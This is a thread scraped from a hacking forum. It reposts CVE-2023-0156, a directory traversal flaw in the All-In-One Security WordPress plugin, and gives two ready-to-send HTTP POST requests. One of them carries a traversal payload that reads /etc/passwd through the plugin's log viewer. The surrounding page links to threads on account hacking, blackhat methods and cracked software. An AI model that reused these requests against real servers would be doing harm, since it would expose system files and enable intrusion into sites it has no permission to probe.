WordPress Plugin CVE-2023-0156 | HackTube | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!

  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

WordPress Plugin CVE-2023-0156

WordPress Plugin CVE-2023-0156

mariottide
LV
1
 

mariottide

Member
Joined
Apr 2, 2023
Threads
11
Likes
6
Awards
4
Credits
2,751©
Cash
0$

CVE ID: CVE-2023-0156


Vulnerability Type: Directory Traversal


Description: The All-In-One Security (AIOS) plugin for WordPress is vulnerable to directory traversal in versions up to, and including, 5.1.4. This allows authenticated attackers with administrator-level permissions to read the contents of arbitrary files on the server.


Steps to reproduce:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2 Host: <host> Cookie: <cookies> Content-Length: 125 Content-Type: application/x-www-form-urlencoded _wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2 Host: <host> Cookie: <cookies> Content-Length: 98 Content-Type: application/x-www-form-urlencoded _wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs

Link:

To view the content, you need to Sign In or Register.

To view the content, you need to Sign In or Register.

Click to read more...
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Register

Log in

Already have an account? Log in here.

Similar threads

Younesx01
    • AUTOBLOGGING GUIDE 2024 FOR BEGINNERS
    0
    45
    Younesx01
    Younesx01
    C0M4705E
    • Source Code Neuronet v1.0 – AI Business & Start-up WordPress Theme
    1
    76
    Hackertribune
    Hackertribune
    SnifferSL
    • A curated list of various bug bounty tools
    0
    81
    SnifferSL
    SnifferSL
    MulaBhai
    • HOW TO HACK INSTAGRAM & FACEBOOK ACCOUNT COMPLETE STEP BY STEP GUIDE
    47
    913
    JrSoundCar
    JrSoundCar
    El Banderasito
    • 2 free Software that kills ANY viruses
    0
    48
    El Banderasito
    El Banderasito
    amolsawant89
    • iWP-DevToolz (Pro) - WordPress Plugin Maker + Code Generator rev23.05.01
    0
    128
    amolsawant89
    amolsawant89
    kha22lee
    • Method/Tut ☢️IMPORTANT ☢️ MUST KNOW WEBSITES ☢️ BLACKHAT ☢️
    39
    652
    pryoc
    pryoc
    moonlight14
    • Adobe Photoshop 2023 v24.7.2.832 (x64) + Fix
    0
    72
    moonlight14
    moonlight14
    rayssen
    • ⚡Advanced Web Hacking Tools 2022-2023 Latest Version ⚡
    20
    523
    ifxwej@pretreer
    ifxwej@pretreer
    edelweiss666
    • SQLi/Dork QUERY PATH FOR DOMAIN GRABBER
    6
    143
    marklester820
    marklester820
    • Top Bottom
    Tools : Download Tools from our Resources.
    Configs : Download Configs[ob/ob2/svb/cyb/anom].
    Memes : Bored? Lets have some Memes (⁠◠⁠‿⁠◕⁠)
    Crax.Tube : 1st LEARN... Then remove the "L".
    NSFW : I stay away from the internet as much
                                               as I can. Except for PORN.
    Upgrade : Just £15 to access everything NOW!
    Earn : Low on Money?Start Earning from Crax Now!
    Crax.Shop : Buy/Sell without getting Scammed 💯